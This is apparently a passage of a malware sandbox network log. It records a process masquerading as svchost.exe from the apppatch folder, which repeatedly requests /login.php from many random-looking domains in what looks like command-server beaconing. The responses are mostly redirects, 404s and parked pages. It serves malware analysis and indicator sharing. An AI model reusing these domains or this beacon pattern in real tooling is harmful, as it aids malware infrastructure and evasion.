Nov 11, 2024 18:33:33.997680902 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:33:34.347306013 CET | 974 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rj01KgpBG8OZgWY3mmqcKGip3rejYHCi5FMgCEkDTw3OdoxIJaHEHrUtmInv2x4uxVZVn2bVTj46onIs7PuoUQdbpj4v2yAwKDetXeEGRhQ1v9rUU1tuMQ88aDs%2BPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10072fbc21c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1287&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1946&recv_bytes=729&delivery_rate=2202281&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:33:36.465225935 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:33:36.805332899 CET | 981 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:36 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sdt3rhZ937lWUa%2FpFP2mps9g0Uxja%2BPMKIZudf5LbFfw4Lo7JROh4DO%2FEpjcMx9wxZNucyP%2FdvaFVwTS52dkCpobpUCKtlLEmskILpKxS8IOmPBrzHVcqD5nTBuW%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10073f2893c468-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1294&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=2202281&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49711 | 199.59.243.227 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.374217033 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
Nov 11, 2024 18:33:08.796216011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:08 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: b5c85606-7b7e-4cde-a75c-fbd25dd3c807
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807; expires=Mon, 11 Nov 2024 17:48:08 GMT; path=/
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:33:08.796248913 CET | 528 | IN |
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjVjODU2MDYtN2I3ZS00Y2RlLWE3NWMtZmJkMjVkZDNjODA3IiwicGFnZV90aW1lIjoxNzMxMzQ2Mzg4LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49713 | 178.162.217.107 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.449562073 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49714 | 75.2.71.199 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.648514032 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
Nov 11, 2024 18:33:09.078133106 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Location: https://puzylyp.com/login.php
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49715 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.666512012 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
Nov 11, 2024 18:33:09.097176075 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49716 | 178.162.217.107 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.871138096 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49717 | 91.195.240.19 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:08.952713013 CET | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:09.719140053 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-6sm9t
                                                                                                                                                                                                              server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49718 | 18.208.156.248 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:09.034069061 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
Nov 11, 2024 18:33:09.403259993 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49721 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:09.163611889 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
Nov 11, 2024 18:33:09.608371973 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:09 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49722 | 154.212.231.82 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:09.878634930 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:33:10.778871059 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:10.817636013 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:33:11.176943064 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:11 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:34.063997984 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:33:34.422350883 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:35.413960934 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:33:35.785597086 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49724 | 13.248.169.48 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:12.456636906 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupydeq.com
Nov 11, 2024 18:33:12.902740955 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:12 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49725 | 188.114.96.3 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:12.723759890 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
Nov 11, 2024 18:33:13.583972931 CET | 799 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIH5nBpvu97vfpTRI%2FPeqcZwtQc5UbikrTTfkLzsv7Dnc9qT6DGSz%2F6fUYh9B8RIm%2FZlPbtmlT4giJhsaGJ%2Bc6Rh73NMI1Lv3KNn6EBxyW98ErUJ%2B8rfpBDac9OyXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006ace9d3ac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12220&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:33:13.586527109 CET | 173 | IN
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:33:15.766532898 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
Nov 11, 2024 18:33:16.123976946 CET | 971 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:16 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Lwajwd9ivunoMU4pPvyoOV1PU3KpoXrzlpWFNEbsEx5zZGsonxKP2HrndTkoN4Rag5Y51uVzlepr3%2F7hqmudDc9NFHTnVWM4hSdQJrQQ3qGuG5CLbl6mk5GEsUKAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006bdd99cac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12218&sent=5&recv=7&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=285507&cwnd=39&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:33:38.156356096 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
Nov 11, 2024 18:33:38.526571035 CET | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ZS5SK5VaRyOFUqLl0ogej3xQHaI2jQ1o05LEiiWlgnJ6do4cQbdHwJVd2nuUmJDnDwvIDiO1jXeXzaYcTVEPCvpsClpnkykPnUKKIgOMcncD5%2BGw55p2p%2FKKED%2FnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100749c9aeac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12207&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1943&recv_bytes=729&delivery_rate=285507&cwnd=41&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:33:38.526650906 CET | 173 | IN
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:33:40.907377005 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
Nov 11, 2024 18:33:41.269639969 CET | 979 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:41 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://lysyvan.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnRFf7dM6s%2Bjmmw4RHBHU90dtjsWu%2FUjLhpWMuqdKeik6dwLDt3Lc2huPMV7EuSA1GRP%2BkrNs3jeYHYgMz9UG6CfOrR0vgOruMZhB4L3oxV92wR%2BLPyU559PYATHzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10075aff17ac72-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
